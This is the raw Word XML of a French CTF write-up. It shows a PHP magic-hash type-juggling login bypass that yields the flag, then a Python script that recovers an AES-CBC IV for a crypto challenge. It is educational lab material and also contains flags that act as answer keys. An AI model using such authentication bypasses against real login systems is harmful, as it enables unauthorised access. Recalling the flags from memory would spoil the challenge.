        <w:t xml:space="preserve">On cherche à obtenir un string representant un float en PHP à partir du hash, nous prendrons un magic hash provenant du site “https://www.whitehatsec.com/blog/magic-hashes/”. Pour le hashage de type RIPEMD160, c’est le nombre 20583002034. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">Le hash devient </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>00e1839085851394356611454660337505469745</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>. Il doit commencer par 2 zéros pour passer la ligne “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$hash = substr($hash, 1,10);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">”. Notre entrée est ensuite réduite à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0e1839085 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">et restera un float lorsqu’elle est concaténée avec le nom de l’utilisateur si et seulement si celui-ci est un nombre. On aura un hash de la forme </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0e1839085[0-9]*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> qui est toujours la représentation d’un float.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>On peut valider le challenge avec les identifiants suivant :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Username: 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Password: 20583002034</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">Un fois connecté, le flag apparait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ESE{H4cking_B0wling_and_Juggl1ng}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun"/>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc824802714"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>CRYPTO 300 - Broken Algorithm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Cette épreuve est constituée de 2 fichiers : ESE_Broken_Algorithm.plain et ESE_Broken_Algorithm.enc qui contiennent respectivement le texte en clair et en chiffré. Partant du constant que le texte est en clair il nous faut probablement trouver la clef ou autre chose, il nous faut aussi trouver le type de chiffrement. L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>’indice du challenge nous met sur la voie : “L'équipe de l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>e vous remercie de votre participation”, on se base sur de l’AES CBC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Après inspection du fichier “.enc”, on trouve 2 lignes en base64. La première est très courte donc cherche à la décoder et à obtenir quelques informations dessus :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5844540" cy="401955"/>
            <wp:effectExtent l="0" t="0" r="381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13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5844540" cy="401955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t>La ligne contient 32 caractères c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>’est une taille intéressante pour une clef, essayons de retrouver l’IV avec cette clef.</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80"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>!/</w:t>
            </w:r>
            <w:r>
              <w:t>usr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>bin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>env</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>python</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>-*-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>coding</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>utf</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>8</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t>from</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Crypto</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>Cipher</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>import</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>AES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>from</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Crypto</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>import</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Random</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>import</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>base64</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decrypt(</w:t>
            </w:r>
            <w:r>
              <w:t>msg</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:t>iv</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</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decryptor</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>AES</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="808000"/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>key</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>AES</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>MODE_CBC</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>iv</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return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>decryptor</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>decrypt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>msg</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xor(</w:t>
            </w:r>
            <w:r>
              <w:t>s1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:t>s2</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return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>''</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>join</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>chr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>ord</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>^</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>ord</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>b</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>))</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="808000"/>
              </w:rPr>
              <w:t>for</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:t>b</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>zip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>s1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:t>s2</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flag_challenge():</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Open</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>the</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>file</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>with</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>open</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'ESE_Broken_Algorithm.enc'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'r'</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lines</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>f</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>readlines</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with</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>open</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'ESE_Broken_Algorithm.plain'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'r'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>as</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>g</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plain</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>g</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>readlines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plain</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>""</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>join</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>plain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key</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>base64</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>b64decode</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>lines</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>0</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msg</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>base64</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>b64decode</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>lines</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>1</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iv_broken</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>x00'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>16</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rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Decrypt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>with</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>XOR</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>get</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>the</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>IV</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decrypted</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
